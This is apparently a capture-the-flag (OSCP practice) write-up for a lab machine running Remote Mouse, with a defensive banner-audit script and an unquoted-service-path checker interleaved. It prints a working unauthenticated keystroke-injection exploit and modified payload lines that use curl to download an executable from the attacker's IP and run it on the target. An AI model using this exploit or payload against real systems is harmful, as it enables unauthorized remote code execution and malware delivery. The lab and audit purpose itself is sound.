Mice
Enumeration
NMAP
```
┌──(kali㉿kali)-[~/Documents/OSCPprep/mice]
└─$ nmap 192.168.162.199 -p- -Pn -oN nmapALL.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 13:06 EDT
Nmap scan report for 192.168.162.199
Host is up (0.023s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
1978/tcp open  unisql
1979/tcp open  unisql-java
1980/tcp open  pearldoc-xact
3389/tcp open  ms-wbt-server
7680/tcp open  pando-pub
Nmap done: 1 IP address (1 host up) scanned in 129.57 seconds
```
Port 1978
Googling it returns a piece of software called Remote Mouse. This software appears to turn your mobile device into a remote mouse/keyboard for a computer.
Remote Mouse has a vulnerability where user-supplied input is not sanitized, which allows remote commands to be passed and executed.
Also, connecting to the port returns a string which can be used to fingerprint this software:
```
┌──(kali㉿kali)-[~/Documents/OSCPprep/mice]
└─$ nc 192.168.162.199 1978
SIN 15win nop nop 300
```
There are two possible banners we might see when connecting to this service:
SIN 15win pwd pwd 300 : indicates that the service requires authentication.
SIN 15win nop nop 300 : indicates that the service does not require authentication.
From here we know the service does not require authentication.
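As an added example (mine, not code from the writeup or from the Remote Mouse project), here is a small audit script a defender can run against their own hosts to find Remote Mouse instances that answer with the unauthenticated banner. It assumes only the two banner strings shown above and the TCP control port 1978 from the scan; `start_fake_service` is a constructed lab helper that replies with a chosen banner on loopback so the check can be exercised offline, and the `"remote-mouse-other"` status for unknown `SIN` banners is my own convention.

```python
import socket
import threading

REMOTE_MOUSE_PORT = 1978

# Banner strings from the writeup: "pwd pwd" = password required, "nop nop" = no password
BANNER_PASSWORD = "SIN 15win pwd pwd 300"
BANNER_NO_AUTH = "SIN 15win nop nop 300"


def classify_banner(banner):
    """Map a raw banner to a status string.

    "unauthenticated":     Remote Mouse accepting input with no password set
    "password-protected":  Remote Mouse with a password configured
    "remote-mouse-other":  has the "SIN " prefix but a mode this script does not know
                           (assumption: flag for manual review rather than guess)
    "unknown":             not a Remote Mouse banner at all
    """
    text = banner.decode("ascii", errors="replace").strip()
    if text == BANNER_NO_AUTH:
        return "unauthenticated"
    if text == BANNER_PASSWORD:
        return "password-protected"
    if text.startswith("SIN "):
        return "remote-mouse-other"
    return "unknown"


def check_host(host, port=REMOTE_MOUSE_PORT, timeout=5.0):
    """Connect to the control port, read the greeting and return a finding dict."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            banner = sock.recv(1024)
    except OSError as exc:  # connection refused, timed out, or host unreachable
        return {"host": host, "port": port, "status": "unreachable", "detail": str(exc)}
    return {"host": host, "port": port, "status": classify_banner(banner),
            "detail": banner.decode("ascii", errors="replace").strip()}


def audit(hosts, port=REMOTE_MOUSE_PORT, timeout=5.0):
    """Return only the findings that need action: instances running without a password."""
    return [f for f in (check_host(h, port, timeout) for h in hosts)
            if f["status"] == "unauthenticated"]


def start_fake_service(banner):
    """Constructed lab helper: a one-shot listener on 127.0.0.1 that sends `banner` to
    the first client and then closes. Returns the bound port so tests can run offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    # Offline demonstration against the constructed listeners; in use, pass real hosts to audit().
    open_port = start_fake_service(b"SIN 15win nop nop 300")
    locked_port = start_fake_service(b"SIN 15win pwd pwd 300")
    for p in (open_port, locked_port):
        print(check_host("127.0.0.1", p))
    print("needs action:", audit(["127.0.0.1"], port=open_port))
```

The only finding that needs a ticket is `"unauthenticated"`; a password-protected instance still exposes a keyboard-injection surface to anyone holding the password, so the usual fix is to bind the software to a trusted network or remove it from hosts that do not need it.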
By exposing this service, the victim is essentially providing a remote keyboard to the attacker. This means we can spin up a cmd prompt on the target machine and, character by character, type out a command to execute.
Foothold
POC
We can execute commands on the target system and cause the victim to ping our IP.
Code
The POC for this exploit can be seen below, just click to expand. It was quite big so I wrapped it in this collapsing field.
The original POC from exploitdb just pops calc, so it needed to be edited with our payload. `\n` characters needed to be added after each string sent, to act as a user pressing ENTER.
```python
#!/usr/bin/python2
# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
# Date: 2019-09-04
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10

# Remote Mouse 3.008 fails to check for authentication and will execute any command any machine gives it
# This script pops calc as proof of concept (albeit a bit slowly)
# It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself

from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv


def Ping(ip):
    # Fingerprint the TCP control port: only the "nop nop" banner means no password is set
    try:
        target = socket(AF_INET, SOCK_STREAM)
        target.settimeout(5)
        target.connect((ip, 1978))
        response = target.recv(1048)
        target.close()
        if response == "SIN 15win nop nop 300":
            return True
        else:
            return False
    except:
        print("ERROR: Request timed out")


def MoveMouse(x, y, ip):
    # Mouse movement is sent as `times` repeated single-step UDP datagrams
    def SendMouse(command, times, ip):
        for x in range(times):
            target = socket(AF_INET, SOCK_DGRAM)
            target.sendto(command, (ip, 1978))
            sleep(0.001)
    if x > 0:
        command = "mos 5m 1 0"
        SendMouse(command, x, ip)
    elif x < 0:
        x = x * -1
        command = "mos 5m -1 0"
        SendMouse(command, x, ip)
    if y > 0:
        command = "mos 5m 0 1"
        SendMouse(command, y, ip)
    elif y < 0:
        y = y * -1
        command = "mos 6m 0 -1"
        SendMouse(command, y, ip)


def MousePress(command, ip, action="click"):
    if action == "down":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command + " d"), (ip, 1978))
    elif action == "up":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command + " u"), (ip, 1978))
    elif action == "click":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command + " d"), (ip, 1978))
        target.sendto((command + " u"), (ip, 1978))
    else:
        raise Exception('MousePress: No action named "' + str(action) + '"')


def SendString(string, ip):
    # Each character is looked up in the keycode table below and sent as its own datagram
    for char in string:
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto(characters[char], (ip, 1978))
        sleep(0.5)


class mouse:
    leftClick = "mos 5R l"
    rightClick = "mos 5R r"
    middleClick = "mos 5R m"


characters = {
    "A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
    "F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
    "K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
    "P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
    "U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
    "Z":"key 8[ras]111",
    "a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
    "f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
    "k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
    "p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
    "u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
    "z":"key 7[ras]79",
    "1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
    "6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 7[ras]13", "9":"key 7[ras]12", "0":"key 6[ras]5",
    "\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",
    "+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
    ">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
    "#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
    "*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
    '"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
    "~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
    ",":"key 7[ras]25", ".":"key 7[ras]27"
}


def PopCalc(ip):
    MoveMouse(-5000, 3000, ip)  # mouse moves to the Windows icon in the bottom-left corner
    MousePress(mouse.leftClick, ip)
    sleep(1)
    SendString("cmd.exe", ip)  # open cmd prompt
    sleep(1)
    SendString("\n", ip)  # enter, to execute the command
    sleep(1)
    SendString("ping -n 5 192.168.49.162", ip)  # commands here
    sleep(1)
    SendString("\n", ip)
    print("SUCCESS! Process has run on target", ip)


def main():
    try:
        targetIP = argv[1]
    except:
        print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
        exit()
    if Ping(targetIP) == True:
        PopCalc(targetIP)
    else:
        print("ERROR: Target machine is not running RemoteMouse")
        exit()


if __name__ == "__main__":
    main()
```
The SendString calls used for the foothold payload in place of the ping command:
```python
SendString("curl http://192.168.49.162:80/poshx86.exe -o C:\\Windows\\System32\\Tasks\\poshx86.exe", ip)
SendString("C:\\Windows\\System32\\Tasks\\poshx86.exe", ip)
```
Screenshot from the victim just for fun to see how many cmd prompts were open from my attempts.
```
RegPath: HKLM\Software\Classes\htmlfile\shell\open\command
Folder: C:\Program Files\Internet Explorer
File: C:\Program Files\Internet Explorer\IEXPLORE.EXE %1 (Unquoted and Space detected)
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
wcncsvc: GenericExecute (Start/Stop)
BcastDVRUserService_5f668: GenericExecute (Start/Stop)
ConsentUxUserSvc_5f668: GenericExecute (Start/Stop)
CredentialEnrollmentManagerUserSvc_5f668: GenericExecute (Start/Stop)
DeviceAssociationBrokerSvc_5f668: GenericExecute (Start/Stop)
DevicePickerUserSvc_5f668: GenericExecute (Start/Stop)
DevicesFlowUserSvc_5f668: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_5f668: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_5f668: GenericExecute (Start/Stop)
UdkUserSvc_5f668: GenericExecute (Start/Stop)
UnistoreSvc_5f668: GenericExecute (Start/Stop)
UserDataSvc_5f668: GenericExecute (Start/Stop)
WpnUserService_5f668: GenericExecute (Start/Stop)
```
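The enumeration output above flags an unquoted command path containing spaces. As an added example (mine, not the enumeration tool's code or the writeup's), the following check reproduces that finding from a defender's side: it classifies a command line as unquoted-with-spaces and produces the quoted form that closes the issue. `SAMPLE_REPORT` is constructed from the lines above plus two made-up safe lines for contrast; treating the first `.exe` token as the end of the executable path is my assumption, adequate for the `File:` lines of this kind of report.

```python
import re

# Constructed sample in the style of the enumeration output above, with the tool's own
# "(Unquoted and Space detected)" annotation kept and two safe lines added for contrast.
SAMPLE_REPORT = """\
RegPath: HKLM\\Software\\Classes\\htmlfile\\shell\\open\\command
Folder: C:\\Program Files\\Internet Explorer
File: C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE %1 (Unquoted and Space detected)
File: "C:\\Program Files\\Example App\\app.exe" /run
File: C:\\Windows\\System32\\svchost.exe -k netsvcs
"""

# Executable path = everything up to the first ".exe" (assumption); the rest is arguments.
EXE_PATH_RE = re.compile(r"^(?P<exe>.*?\.exe)(?P<args>\s.*)?$", re.IGNORECASE | re.DOTALL)
# Trailing annotation some enumeration tools append to the line.
ANNOTATION_RE = re.compile(r"\s*\((?:Unquoted|Quoted)[^)]*\)\s*$", re.IGNORECASE)


def check_command(command):
    """Classify one command line.

    Returns a dict with 'vulnerable' (True when the executable path is unquoted and
    contains a space), a 'reason', and, for vulnerable lines, a 'fixed' quoted form
    that can be written back to the registry value or service ImagePath.
    """
    cmd = ANNOTATION_RE.sub("", command.strip())
    if cmd.startswith('"'):
        return {"command": cmd, "vulnerable": False, "reason": "path already quoted"}
    m = EXE_PATH_RE.match(cmd)
    if m is None:
        return {"command": cmd, "vulnerable": False, "reason": "no .exe path recognised"}
    exe, args = m.group("exe"), m.group("args") or ""
    if " " not in exe:
        return {"command": cmd, "vulnerable": False, "reason": "no space in path"}
    return {"command": cmd, "vulnerable": True,
            "reason": "unquoted path containing spaces",
            "fixed": '"%s"%s' % (exe, args)}


def findings_from_report(report):
    """Run check_command over every 'File:' line of a report; return only the vulnerable ones."""
    results = []
    for line in report.splitlines():
        if line.startswith("File:"):
            result = check_command(line[len("File:"):])
            if result["vulnerable"]:
                results.append(result)
    return results


if __name__ == "__main__":
    for finding in findings_from_report(SAMPLE_REPORT):
        print("FLAGGED:", finding["command"])
        print("   FIX :", finding["fixed"])
```

Only the IEXPLORE.EXE line is reported; the already-quoted path and the space-free System32 path pass. The remediation is the quoted form the script prints, applied to the registry value shown in the report.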